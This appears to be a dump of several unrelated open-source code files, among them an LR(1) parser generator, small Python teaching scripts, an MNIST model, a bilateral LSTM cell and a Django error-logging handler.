first1_sets.values())\n return first1_sets\n\n\ndef get_first1_set_for_word(first1_sets: Dict[str, Set[Optional[str]]], word: Tuple[str]) -> Set[Optional[str]]:\n assert EPSILON not in word\n first1 = set()\n for pos, right_symbol in enumerate(word):\n # add all fi(X_{i+1}) to fi(A)\n first1.update(first1_sets.get(right_symbol, set()) - {EPSILON})\n if EPSILON not in first1_sets.get(right_symbol, set()):\n break\n # if A -> X1 ... Xn, and EPSILON in fi(X1),...,fi(Xn), then EPSILON in fi(A)\n if all(EPSILON in first1_sets.get(right, set()) for right in word):\n first1.add(EPSILON)\n return first1\n\n\nclass _Item:\n def __init__(self, prod: Production, pointer: int, la: Optional[str]):\n \"\"\"\n :param la: look-ahead, None iff epsilon\n \"\"\"\n assert 0 <= pointer <= len(prod.right)\n self.prod = prod\n self.pointer = pointer\n self.la = la\n\n def __eq__(self, other):\n if not isinstance(other, _Item):\n return False\n return self.prod == other.prod and self.pointer == other.pointer and self.la == other.la\n\n def __repr__(self) -> str:\n return '_Item[%s -> %s, %r]' % (\n self.prod.left, ' '.join(self.prod.right[:self.pointer] + ('.',) + self.prod.right[self.pointer:]), self.la)\n\n def __hash__(self):\n return hash((self.prod, self.pointer, self.la))\n\n\nclass _Action:\n \"\"\"\n Actions used by parser\n \"\"\"\n\n\nclass _AcceptAction(_Action):\n def __repr__(self) -> str:\n return '_AcceptAction'\n\n\nclass _ReduceAction(_Action):\n def __init__(self, prod: Production):\n self.prod = prod\n\n def __repr__(self) -> str:\n return '_ReduceAction[%r]' % self.prod\n\n\nclass _ShiftAction(_Action):\n def __init__(self, symbol: str):\n assert symbol is not EPSILON\n self.symbol = symbol\n\n def __repr__(self) -> str:\n return '_ShiftAction[%r]' % self.symbol\n\n\nclass ParserGenerator:\n \"\"\"\n A general LR(1) grammar parser generator.\n \"\"\"\n\n def __init__(self, grammar: Grammar):\n self.grammar = grammar\n assert self.grammar.is_start_separated()\n start_prods = self.grammar.get_prods_for(self.grammar.start)\n assert len(start_prods) == 1\n self._start_prod = start_prods[0]\n\n self._initial_state = 0\n self._num_states: int = 0\n self._state_action_table: List[Dict[str, _Action]] = []\n self._state_goto_table: List[Dict[str, int]] = []\n self._state_descr: List[str] = []\n self.first1_sets = make_first1_sets(self.grammar)\n\n self._make()\n\n def _make_item_set(self, initial_items):\n \"\"\"\n Makes the smallest state s at least containing `initial_items`,\n computes its action table act(s,x) -> action (where x is a symbol or EPSILON),\n as well as a set of terminals a s.t. goto(s,a) != sink.\n :param list[_LrItem] initial_items:\n :returns: Completed item set, action function, next symbols\n :rtype: tuple[frozenset[_LrItem], dict[str, _LrAction], list[str]]\n \"\"\"\n add_item_queue = initial_items.copy()\n\n state = set()\n actions: Dict[str, _Action] = {}\n next_symbols = set()\n\n while len(add_item_queue) >= 1:\n item = add_item_queue.pop(-1)\n if item in state:\n continue\n state.add(item)\n if item.pointer == len(item.prod.right):\n # Reduce A -> alpha .\n assert item.la not in actions, 'Grammar not LR(1)! Partial item set %r: item %r action conflicts with %r' % (\n state, item, actions)\n if item.prod != self._start_prod:\n actions[item.la] = _ReduceAction(item.prod)\n else:\n actions[item.la] = _AcceptAction()\n continue\n next_symbol = item.prod.right[item.pointer]\n next_symbols.add(next_symbol)\n if next_symbol in self.grammar.non_terminals:\n # If A-> alpha . B beta in state, add all [B -> . gamma, fi(beta x)]\n word_after_next_symbol = item.prod.right[item.pointer + 1:] + (() if item.la is EPSILON else (item.la,))\n add_item_queue.extend([_Item(p, 0, new_la)\n for p in self.grammar.get_prods_for(next_symbol)\n for new_la in get_first1_set_for_word(self.first1_sets, word_after_next_symbol)])\n else:\n assert next_symbol in self.grammar.terminals\n # Shift A -> . a beta\n assert (\n next_symbol not in actions or\n (isinstance(actions[next_symbol], _ShiftAction) and actions[next_symbol].symbol == next_symbol)), (\n 'Grammar not LR(1)! Partial item set %r: item %r action conflicts with %r' % (state, item, actions))\n actions[next_symbol] = _ShiftAction(next_symbol)\n return frozenset(state), actions, sorted(next_symbols)\n\n def _make(self):\n \"\"\"\n Construct the automaton.\n \"\"\"\n states: Dict[FrozenSet[_Item], int] = {}\n state_action_table: List[Dict[str, _Action]] = []\n state_goto_table: List[Dict[str, int]] = []\n\n def add_next_state(from_state, symbol):\n \"\"\"\n Recursively adds the states reachable from `from_state` when first processing `symbol`.\n Populates`states`, `state_action_table` and `state_goto_table` for all added states\n as well as `state_goto_table` of `from_state`.\n :param frozenset[_LrItem] from_state: reachable (non-sink) state\n :param str symbol: a non-terminal\n \"\"\"\n assert len(from_state) > 0, 'from_state should be reachable, i.e. not the sink state'\n assert symbol is not EPSILON\n to_state, to_state_actions, next_symbols = self._make_item_set([\n _Item(item.prod, item.pointer + 1, item.la)\n for item in from_state if item.pointer < len(item.prod.right) and item.prod.right[item.pointer] == symbol])\n from_state_idx = states[from_state]\n to_state_idx = states.get(to_state, len(states))\n if symbol in state_goto_table[from_state_idx]:\n assert state_goto_table[from_state_idx][symbol] == to_state_idx\n else:\n state_goto_table[from_state_idx][symbol] = to_state_idx\n if to_state in states:\n return\n assert len(state_action_table) < to_state_idx + 1 and len(state_goto_table) < to_state_idx + 1\n states[to_state] = to_state_idx\n state_action_table.append(to_state_actions)\n state_goto_table.append({})\n for next_symbol in next_symbols:\n add_next_state(to_state, next_symbol)\n\n initial_state, initial_actions, initial_next_symbols = self._make_item_set([_Item(self._start_prod, 0, EPSILON)])\n states[initial_state] = 0\n state_action_table.append(initial_actions)\n state_goto_table.append({})\n for initial_symbol in initial_next_symbols:\n add_next_state(initial_state, initial_symbol)\n\n self._num_states = len(states)\n self._state_action_table = state_action_table\n self._state_goto_table = state_goto_table\n self._state_descr = ['{%s}' % ', '.join([repr(item) for item in state]) for state in states.keys()]\n\n def parse_analysis(self, word, tokens, tokens_pos):\n \"\"\"\n :param str word:\n :param list[str] tokens:\n :param list[int] tokens_pos: start index of word for each token\n :rtype: tuple[Production]:\n :raises: ParseError\n :returns: a right-most analysis of `tokens` or raises ParseError\n \"\"\"\n attr_grammar = AttributeGrammar(\n self.grammar, [{}] * len(self.grammar.prods), terminal_attr_rules={term: {} for term in self.grammar.terminals})\n analysis, _ = self.parse_syn_attr_analysis(attr_grammar, word=word, tokens=tokens, tokens_pos=tokens_pos)\n return analysis\n\n def parse_syn_attr_analysis(self,\n attr_grammar: AttributeGrammar,\n word: str,\n tokens: List[str],\n tokens_pos: List[int],\n file_path: Path | DummyPath = DummyPath('default')) -> (Tuple[Production], Dict[str, Any]): # noqa\n \"\"\"\n Integrates evaluating synthetic attributes into LR-parsing.\n Does not work with inherited attributes, i.e. requires the grammar to be s-attributed.\n\n :param AttributeGrammar attr_grammar:\n :param str word:\n :param list[str] tokens:\n :param list[int] tokens_pos: start index of word for each token\n :param Path | DummyPath file_path:\n :rtype: (tuple[Production], dict[str,Any])\n :raises: ParseError\n :returns: a right-most analysis of `tokens` + evaluation of attributes in start symbol\n \"\"\"\n assert attr_grammar.is_s_attributed(), 'only s-attributed grammars supported'\n assert len(tokens) == len(tokens_pos)\n\n accepted = False\n pos = 0\n state_stack = [self._initial_state]\n attr_eval_stack: List[Dict[str, Any]] = []\n start_pos_stack: List[int] = []\n rev_analysis: List[Production] = []\n\n while not accepted:\n while pos < len(tokens) and tokens[pos] is IGNORED_TOKEN:\n pos += 1\n la = EPSILON if pos == len(tokens) else tokens[pos]\n state = state_stack[-1]\n action = self._state_action_table[state].get(la)\n if isinstance(action, _ShiftAction) and action.symbol == la:\n shifted_token = tokens[pos]\n shifted_token_word = get_token_word_from_tokens_pos(word, tokens_pos, pos)\n pos += 1\n state_stack.append(self._state_goto_table[state][action.symbol])\n attr_eval_stack.append(attr_grammar.get_terminal_syn_attr_eval(shifted_token, shifted_token_word))\n start_pos_stack.append(pos - 1)\n elif isinstance(action, _ReduceAction):\n right_attr_evals: List[Dict[str, Any]] = attr_eval_stack[len(attr_eval_stack) - len(action.prod.right):]\n if len(action.prod.right) > 0:\n prod_start_pos = start_pos_stack[len(attr_eval_stack) - len(action.prod.right)]\n else:\n prod_start_pos = pos\n for i in range(len(action.prod.right)):\n state_stack.pop()\n attr_eval_stack.pop()\n start_pos_stack.pop()\n assert len(right_attr_evals) == len(action.prod.right)\n state_stack.append(self._state_goto_table[state_stack[-1]][action.prod.left])\n tree_pos = TreePosition.from_token_pos(\n file_path, word=word, tokens_pos=tokens_pos, from_token_pos=prod_start_pos, to_token_pos=pos)\n attr_eval_stack.append(attr_grammar.eval_prod_syn_attr(\n action.prod, {}, right_attr_evals, helper_values={'_pos': tree_pos}))\n start_pos_stack.append(prod_start_pos)\n rev_analysis.append(action.prod)\n elif isinstance(action, _AcceptAction) and len(state_stack) == 2:\n assert state_stack[0] == self._initial_state\n assert len(attr_eval_stack) == len(start_pos_stack) == len(self._start_prod.right) == 1\n right_attr_evals: List[Dict[str, Any]] = attr_eval_stack[-len(self._start_prod.right):]\n prod_start_pos = start_pos_stack[-len(self._start_prod.right)]\n assert len(right_attr_evals) == len(self._start_prod.right)\n state_stack.clear()\n attr_eval_stack.clear()\n start_pos_stack.clear()\n tree_pos = TreePosition.from_token_pos(\n file_path, word=word, tokens_pos=tokens_pos, from_token_pos=prod_start_pos, to_token_pos=pos)\n attr_eval_stack.append(attr_grammar.eval_prod_syn_attr(\n self._start_prod, {}, right_attr_evals, helper_values={'_pos': tree_pos}))\n rev_analysis.append(self._start_prod)\n start_pos_stack.append(prod_start_pos)\n accepted = True\n else: # error\n if la == \"new_line\":\n pos += 1\n continue\n la_name = '%r token' % la if la is not EPSILON else 'end of file'\n possible_next_tokens = set(self._state_action_table[state].keys())\n raise ParseError(\n program_path=file_path, word=word, pos=tokens_pos[pos] if pos < len(tokens_pos) else len(word),\n message='Unexpected %s, expected: %s' % (la_name, ', '.join(['%r' % t for t in possible_next_tokens])))\n\n assert rev_analysis[-1] == self._start_prod\n assert len(attr_eval_stack) == len(start_pos_stack) == 1\n return tuple(reversed(rev_analysis)), attr_eval_stack[0]\n\n def parse_tree(self, word, tokens, tokens_pos):\n \"\"\"\n :param str word:\n :param list[str] tokens:\n :param list[int] tokens_pos: start index of word for each token\n :rtype: SyntaxTree\n \"\"\"\n\n def make_prod_tree(prod, tree):\n \"\"\"\n :param Production prod:\n :param Callable[[int], SyntaxTree] tree:\n :type: SyntaxTree\n \"\"\"\n return SyntaxTree(prod, *[tree(pos) for pos in range(1, len(prod.right) + 1)])\n\n from functools import partial\n attr_g = AttributeGrammar(\n self.grammar,\n syn_attrs={'tree'},\n prod_attr_rules={\n prod: {'tree.0': partial(make_prod_tree, prod) if len(prod.right) >= 1 else SyntaxTree(prod)}\n for prod in self.grammar.prods},\n terminal_attr_rules={terminal: {'tree.0': None} for terminal in self.grammar.terminals}\n )\n _, root_attr_eval = self.parse_syn_attr_analysis(attr_g, word, tokens, tokens_pos)\n assert 'tree' in root_attr_eval\n root_tree = root_attr_eval['tree']\n assert isinstance(root_tree, SyntaxTree)\n assert root_tree.prod == self._start_prod\n return root_tree\n\n def parse_stream(self, token_stream):\n SE = namedtuple(\"StackElement\", (\"state\", \"marker\"))\n stack = [SE(self._initial_state, token_stream.mark())]\n\n def token():\n return None if token_stream.current() == \"null\" else token_stream.current()\n\n while True:\n state = stack[-1].state\n action = self._state_action_table[state].get(token())\n\n if isinstance(action, _ShiftAction) and action.symbol == token():\n\n current_token = token()\n token_stream.advance()\n post_token_marker = token_stream.mark() # marker after current_token\n stack.append(SE(self._state_goto_table[state][current_token], post_token_marker))\n\n elif isinstance(action, _ReduceAction):\n\n for _ in range(len(action.prod.right)):\n stack[-1].marker.drop()\n stack.pop()\n\n begin_state, begin_marker = stack[-1] # marker and state before the subtree we are reducing\n stack[-1] = SE(stack[-1].state, begin_marker.precede()) # replace marker so we can use begin_marker\n\n begin_marker.done(action.prod.left) # finish subtree\n\n stack.append(SE(self._state_goto_table[begin_state][action.prod.left], token_stream.mark()))\n\n elif isinstance(action, _AcceptAction) and len(stack) == 2:\n stack[1].marker.drop()\n stack[0].marker.done(\"FILE\")\n return\n else:\n # error case\n if token() == \"new_line\":\n token_stream.makeCurrentWhitespace()\n token_stream.advance()\n continue\n\n for state, marker in stack[1:-1]:\n marker.drop()\n\n token_name = '%r token' % token() if token() is not None else 'end of file'\n possible_next_tokens = map(lambda t: \"EOF\" if t is None else t, self._state_action_table[stack[-1].state].keys())\n message = 'Unexpected %s, expected: %s' % (token_name, ', '.join(['%r' % t for t in possible_next_tokens]))\n\n token_stream.advance()\n stack[-1].marker.error(message)\n\n while token() is not None: token_stream.advance()\n\n stack[0].marker.done(\"FILE\")\n return","repo_name":"Zettelkasten/sleepy","sub_path":"sleepy/syntactical_analysis/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":16225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30033979691","text":"def ler_produtos():\n produtos = []\n while True:\n print(\"Digite os dados do produto e pressione Enter. Pressione apenas Enter para sair.\")\n entrada = input().strip()\n if not entrada:\n break\n codigo, descricao, quantidade, preco = entrada.split('#')\n produto = {'codigo': codigo, 'descricao': descricao, 'quantidade': int(quantidade), 'preco': float(preco)}\n produtos.append(produto)\n return produtos\n\ndef buscar_produto(codigo, produtos):\n for produto in produtos:\n if produto['codigo'] == codigo:\n return produto\n return None\n\ndef main():\n produtos = ler_produtos()\n while True:\n codigo = input(\"Digite o código do produto (ou nada para sair): \").strip()\n if not codigo:\n break\n produto = buscar_produto(codigo, produtos)\n if produto is None:\n print(f\"Produto com código {codigo} não encontrado.\")\n else:\n print(f\"Produto Localizado: ('{produto['codigo']}', '{produto['descricao']}', '{produto['quantidade']}', '{produto['preco']:.2f}') \")\n print(\"Obrigado por utilizar nosso sistema!!!\")\n\n\nmain()","repo_name":"siqueirarxd/sistema_de_produtos","sub_path":"sistema_de_produtos.py","file_name":"sistema_de_produtos.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73044048721","text":"import sys\nfrom PySide2 import QtCore, QtScxml\n\n# Qtに関するおまじない\napp = QtCore.QCoreApplication()\nel = QtCore.QEventLoop()\n\n# SCXMLファイルの読み込み\nsm = QtScxml.QScxmlStateMachine.fromFile('states.scxml')\n\n# 初期状態に遷移\nsm.start()\nel.processEvents()\n\n# システムプロンプト\nprint(\"SYS> こちらは天気情報案内システムです\")\n\n# 状態とシステム発話を紐づけた辞書\nuttdic = {\"ask_place\": \"地名を言ってください\",\n \"ask_date\": \"日付を言ってください\",\n \"ask_type\": \"情報種別を言ってください\"}\n\n# 初期状態の取得\ncurrent_state = sm.activeStateNames()[0]\nprint(\"current_state=\", current_state)\n\n# 初期状態に紐づいたシステム発話の取得と出力\nsysutt = uttdic[current_state]\nprint(\"SYS>\", sysutt)\n\n# ユーザ入力の処理\nwhile True:\n text = input(\"> \")\n # ユーザ入力を用いて状態遷移\n sm.submitEvent(text)\n el.processEvents()\n \n # 遷移先の状態を取得\n current_state = sm.activeStateNames()[0]\n print(\"current_state=\", current_state)\n \n # 遷移先がtell_infoの場合は情報を伝えて終了\n if current_state == \"tell_info\":\n print(\"天気をお伝えします\") \n break\n else:\n # その他の遷移先の場合は状態に紐づいたシステム発話を生成\n sysutt = uttdic[current_state]\n print(\"SYS>\", sysutt) \n\n# 終了発話\nprint(\"ご利用ありがとうございました\") \n\n# end of file\n","repo_name":"dsbook/dsbook","sub_path":"weather1.py","file_name":"weather1.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"ja","doc_type":"code","stars":39,"dataset":"github-code","pt":"3"} +{"seq_id":"14222797290","text":"from .base_chart import BaseChart,mpl,plt\nimport numpy as np\nimport pandas as pd \n\nclass BarChart(BaseChart):\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n \n \n def draw_ax(self, data, ax,legend = True,**kwargs):\n d = {}\n\n for value in data[\"values\"]:\n d[value[\"option\"][\"label\"]] = value['y']\n df = pd.DataFrame(data=d,index=data[\"x\"])\n if kwargs.get(\"barh\",False):\n ax = df.plot.barh(ax = ax,rot = 0)\n else:\n ax = df.plot.bar(ax = ax,rot = 0)\n\n if kwargs.get(\"anno\",False):\n for bar_group in ax.containers:\n ax.bar_label(bar_group,padding=1,fontsize = kwargs.get(\"fontsize\",10))\n return super().draw_ax(data, ax,legend,**kwargs)\n\n def draw(self, data,figsize = (7,7),legend = True, **kwargs):\n super().draw(data,['visual/style/ieee-bar.mplstyle'],figsize,legend,**kwargs)\n return \n\n\n\n \nif __name__ == \"__main__\":\n import math\n\n data = {\"x\":list(range(10)),\n \"values\":[\n {\"y\":list(range(10)),\"option\":{\"linewidth\":2,\"label\":\"test\"}},\n {\"y\":list(range(10)),\"option\":{\"linewidth\":2,\"label\":\"test2\"}}\n ]}\n\n bc = BarChart()\n bc.draw(data)\n bc.save(\"bc_test.png\")","repo_name":"junTangs/visual","sub_path":"bar_chart.py","file_name":"bar_chart.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30924154563","text":"import torch\r\nimport torch.nn as nn\r\n\r\nclass BilateralLSTMCell(nn.Module):\r\n\r\n def __init__(self, input_dim, hidden_dim, scope_name): # dimension for input state, hidden state and string identifier for the cell\r\n super(BilateralLSTMCell, self).__init__()\r\n self.input_dim = input_dim\r\n self.hidden_dim = hidden_dim\r\n self.scope_name = scope_name\r\n\r\n # define weight matrices and bias vectors for input gate, forget gate, output gate and the cell state \r\n\r\n #input gate\r\n self.W_i = nn.Linear(input_dim, hidden_dim)\r\n self.U_i = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n self.V_i = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n\r\n #forget gate\r\n self.W_f = nn.Linear(input_dim, hidden_dim)\r\n self.U_f = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n self.V_f = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n\r\n #output gate\r\n self.W_o = nn.Linear(input_dim, hidden_dim)\r\n self.U_o = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n self.V_o = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n\r\n #cell gate\r\n self.W_c = nn.Linear(input_dim, hidden_dim)\r\n self.U_c = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n self.V_c = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n\r\n def forward(self, x, hidden_memory_tm1, hidden_memory_tm2): # to compute LSTM cell's output; input, tuple with previous hidden and memory state, two time steps ago\r\n\r\n # Unpack the hidden states and memory from the previous time steps\r\n previous_hidden_state, c_prev = hidden_memory_tm1\r\n previous_hidden_state_, _ = hidden_memory_tm2\r\n\r\n #calculate input gate activation \r\n i = torch.sigmoid(\r\n self.W_i(x) +\r\n self.U_i(previous_hidden_state) +\r\n self.V_i(previous_hidden_state_)\r\n )\r\n\r\n #calculate forget gate activation \r\n f = torch.sigmoid(\r\n self.W_f(x) +\r\n self.U_f(previous_hidden_state) +\r\n self.V_f(previous_hidden_state_)\r\n )\r\n\r\n #calculate output gate activation \r\n o = torch.sigmoid(\r\n self.W_o(x) +\r\n self.U_o(previous_hidden_state) +\r\n self.V_o(previous_hidden_state_)\r\n )\r\n\r\n #calculate new cell state (c_)\r\n c_ = torch.tanh(\r\n self.W_c(x) +\r\n self.U_c(previous_hidden_state) +\r\n self.V_c(previous_hidden_state_)\r\n )\r\n\r\n #update the cell state (c)\r\n c = f * c_prev + i * c_\r\n\r\n #calculate hidden state \r\n h_t = o * torch.tanh(c)\r\n\r\n #return hidden state and updated memory\r\n return h_t, (h_t, c)\r\n\r\nclass MultilayerCells(nn.Module):\r\n\r\n def __init__(self, cells):\r\n super(MultilayerCells, self).__init__()\r\n self.cells = cells # individual LSTM cells making up the multilayer cell \r\n\r\n def forward(self, input, state, state_): #input, list of the previous hidden states+memory states for each individual cell, same for 2 time steps ago \r\n cur_inp = input #current input\r\n new_states = [] #emplty list for new states \r\n\r\n for i, cell in enumerate(self.cells):\r\n with torch.no_grad(): # Disabling gradient computation for efficiency\r\n cur_inp, new_state = cell(x=cur_inp, hidden_memory_tm1=state[i], hidden_memory_tm2=state_[i])\r\n new_states.append(new_state)\r\n\r\n return cur_inp, new_states","repo_name":"arra131/Thesis","sub_path":"Pytorch code/BilateralLSTM_class.py","file_name":"BilateralLSTM_class.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9921306992","text":"from lja.managers.training_manager import MnistNetworkTrainingManager\nfrom lja.LT_extractor.extractor import LTExtractor\nimport torch\n\n# 1. Load model\nmanager = MnistNetworkTrainingManager(model_type=\"dropout\")\nmanager.validation_loop()\nnet_device = manager.net.device\n\n\n# 2. Input query\n# select n-samples of each of the 10 different classes\nlabels = manager.test_dataset.targets\nindices = []\nn = 100\nfor i in range(10):\n index = (labels == i).nonzero(as_tuple=True)[0][0:n]\n indices += index.tolist()\n\n\n# select input query from test dataset\nx0 = manager.test_dataset.data.reshape(-1, 28 * 28).float()[indices, :]\nx0 = x0.to(net_device)\nlabels = labels[indices]\n\n# 3. Create extractor\nextractor = LTExtractor(manager.net, x0, labels)\n\n# 4. Extract linear transformations\nextractor.extract()\n\n# 5. Store\nextractor.store(\"mnist/dropout/\")\n","repo_name":"leesharkey/layerwise_jacobian_analysis","sub_path":"scripts/mnist_pipeline/2_extract_transformations.py","file_name":"2_extract_transformations.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"43202643352","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[16]:\n\n\nimport tensorflow as tf\n\nmnist=tf.keras.datasets.mnist #28x28 images of written 0-9\n(x_train, y_train),(x_test, y_test)= mnist.load_data() #loading the data in these variables\n\n#normlizing the data - scaling the values between 0 and 1 - makes it easier for python\nx_train = tf.keras.utils.normalize(x_train, axis=1) \nx_test = tf.keras.utils.normalize(x_test, axis=1)\n\n#building the model architecture\nmodel = tf.keras.models.Sequential() #using a sequential model\nmodel.add(tf.keras.layers.Flatten())#our input layer that we have flattened\nmodel.add(tf.keras.layers.Dense(128, activation=tf.nn.relu)) #1st hidden layer - Dense layer with 128 neurons and a relu \nmodel.add(tf.keras.layers.Dense(128, activation=tf.nn.relu)) #2nd hidden layer\nmodel.add(tf.keras.layers.Dense(10, activation=tf.nn.softmax)) #output layer. 10 nisi so that possible output neuron. Softmax for probability distribution\n\n#parameters to train the model \nmodel.compile (optimizer=\"adam\", #adam is the go-to. Another example is gradient descent.\n loss=\"sparse_categorical_crossentropy\",#eta default go to\n metrics=[\"accuracy\"]) #what metrics you wanna follow\n#the nn is always trying to minimize loss \n\n#training the model\nmodel.fit(x_train, y_train, epochs=3) #3 bar dataset er upor diye ghurbe\n\n\n\n# In[17]:\n\n\n#checking if we have overfit or underfit\n#calculating validation loss and validation accuracing\nval_loss, val_acc = model.evaluate(x_test,y_test)\nprint(val_loss, val_acc)\n#loss would be slightly lower and accuracy would be slightly higher for best results\n\n\n# In[20]:\n\n\n#saving a model\nmodel.save(\"epic_num_reader.model\")\n#loading a model\nnew_model = tf.keras.models.load_model(\"epic_num_reader.model\")\n\n\n# In[39]:\n\n\n#making a prediction\npredictions = new_model.predict([x_test])\n\n#predict always always takes a list, so [] dewa lagbe\n\n\n# In[48]:\n\n\n#print(predictions) #eta ekta pixel array er list dibe. Eta ke num banabo\n\nimport numpy as np\nprint(np.argmax(predictions[2042])) #finds the argument and gives the maximum value. Highest probability kisher.\n\n\n# In[47]:\n\n\n#checking if the value is true using matplotlib\nimport matplotlib.pyplot as plt\nplt.imshow(x_test[2042]) #displays data as image on a 2D raster\nplt.show()\n\n","repo_name":"sharar-muhtasim/Deep_Learning_Basics","sub_path":"Mnist_Number_Prediction.py","file_name":"Mnist_Number_Prediction.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24414790435","text":"from collections import Counter\nimport re\nimport os\n\n\ndef open_file(filename):\n\n if not os.path.exists(filename):\n return -1\n\n if not filename.endswith('.txt'):\n return -2\n\n if os.stat(filename).st_size == 0:\n return -3\n\n else:\n with open(filename, \"r\", encoding=\"utf-8\") as file:\n return file.read()\n\n\ndef count_paragraphs(filename):\n count = 0\n with open(filename, \"r\", encoding=\"utf-8\") as file:\n for line in file:\n if line[:5] == \" \":\n count += 1\n\n return count\n\n\ndef get_words(file):\n raw_text = re.findall(r'\\w+', file)\n words = [word.lower() for word in raw_text if word.isalpha()]\n\n return words\n\n\ndef get_all_letters(words):\n return ''.join(words).lower()\n\n\ndef word_freq(words, letter):\n counter = 0\n\n for word in words:\n if letter in word:\n counter += 1\n\n return counter / len(words)\n\n\ndef letter_stat(letters, words):\n letter_count = len(letters)\n stat = dict(Counter(letters))\n\n for key in stat.keys():\n letter_freq = stat[key] / letter_count\n word_proportion = word_freq(words, key)\n\n stat[key] = (letter_freq, word_proportion)\n\n return stat\n\n\ndef bilingual_count(words):\n count = 0\n\n for word in words:\n if re.search(r'[a-zA-Z]', word) and re.search(r'[а-яА-Я]', word):\n count += 1\n\n return count\n\n\ndef text_stat(filename):\n file = open_file(filename)\n\n if file == -1:\n return {\"error\": \"No such file or directory\"}\n\n if file == -2:\n return {\"error\": \"Only .txt files are supported\"}\n\n if file == -3:\n return {\"error\": \"File is empty\"}\n\n else:\n words = get_words(file)\n letters = get_all_letters(words)\n\n stats = letter_stat(letters, words)\n stats[\"word_amount\"] = len(words)\n stats[\"paragraph_amount\"] = count_paragraphs(filename)\n stats[\"bilingual_word_amount\"] = bilingual_count(words)\n\n return stats\n\n\nfilename = \"./data/missing.txt\"\n\nprint(text_stat(filename))\n","repo_name":"CosmonautComrad/swoyo_tasks","sub_path":"text stat/text_stat.py","file_name":"text_stat.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31829899087","text":"import sys\nimport cv2\nimport os\nfrom sys import platform\nimport argparse\nimport copy\nimport json\n\n# open absolute_coords.json to get the absolute coordinates\nwith open(\"absolute_coords.json\") as json_file:\n data = json.load(json_file)\n\ndict_copy = copy.deepcopy(data)\n\n\ndef mirror(items):\n for item in items:\n x = item[0]\n # formula to calculate how many pixels to move point by -(x-mp)*2\n formula = -(x - half_width) * 2\n item[0] = x + formula\n return items\n\n\n# augment data to be inverted\nfor key in dict_copy.keys():\n augemented_video = dict_copy[key]\n half_width = augemented_video[\"width\"] / 2\n body = augemented_video[\"body\"]\n\n body = mirror(body)\n\n data[key + \"_inverted\"] = augemented_video\n\n# augment data to be scaled\nfor key in dict_copy.keys():\n augemented_video = dict_copy[key]\n\n data[key + \"_scaled\"] = augemented_video\n\nwith open(\"augmented.json\", \"w\") as json_file:\n data = json.dumps(data, indent=True)\n json_file.write(data)\n json_file.write(\"\\n\")\n","repo_name":"KristinaG5/AI-Sign-Language-Translator","sub_path":"research/preprocessing/data_augmentation.py","file_name":"data_augmentation.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"17011361670","text":"import unittest\n\nfrom anomalearn.exceptions import InvalidInputShape\n\n\nclass TestInvalidInputShape(unittest.TestCase):\n def test_raise(self):\n try:\n raise InvalidInputShape((10, 3), tuple([10]))\n except InvalidInputShape as e:\n self.assertIsInstance(e, InvalidInputShape)\n","repo_name":"marcopetri98/anomalearn","sub_path":"tests/anomalearn/exceptions/TestInvalidInputShape.py","file_name":"TestInvalidInputShape.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"38804262172","text":"import re\nimport logging\nimport traceback\n\n\ndb_default_formatter = logging.Formatter()\n\n\nclass DatabaseLogHandler(logging.Handler):\n def log_level(self, levelno):\n logs = {}\n logs[logging.NOTSET] = \"NotSet\"\n logs[logging.INFO] = \"Info\"\n logs[logging.WARNING] = \"Warning\"\n logs[logging.DEBUG] = \"Debug\"\n logs[logging.ERROR] = \"Error\"\n logs[logging.FATAL] = \"Fatal\"\n return logs[levelno]\n\n def emit(self, record):\n from .models import LogError\n\n line = 0\n pathname = record.pathname\n function = \"\"\n \n if hasattr(record, \"exc_info\") and not record.exc_info is None and len(record.exc_info) >= 2:\n trace = db_default_formatter.formatException(record.exc_info)\n trace_parse = traceback.format_tb(record.exc_info[2]).pop()\n result = re.findall(r\".*, line (\\d+), in .*\", trace_parse)\n if len(result) > 0:\n line = int(result[0])\n result = re.findall(r'.* File \"(.*)\", line .*', trace_parse)\n if len(result) > 0:\n pathname = result[0]\n result = re.findall(r\".*, in (.*)\", trace_parse)\n if len(result) > 0:\n function = result[0]\n if hasattr(record, \"request\"):\n kwargs = {\n \"logger_name\": record.name,\n \"level\": self.log_level(record.levelno),\n \"pathname\": pathname,\n \"line\": line,\n \"function\": function,\n \"http_method\": record.request.method,\n \"request_url\": record.request.path,\n \"exception_type\": record.exc_info[0].__name__,\n \"exception_value\": str(record.exc_info[1]),\n \"stack_trace\": trace,\n }\n if hasattr(record.request, \"user\") and record.request.user.is_authenticated:\n kwargs[\"user\"] = record.request.user\n else:\n kwargs = {\n \"logger_name\": record.name,\n \"level\": self.log_level(record.levelno),\n \"pathname\": pathname,\n \"line\": line,\n \"function\": function,\n \"exception_type\": record.exc_info[0].__name__,\n \"exception_value\": 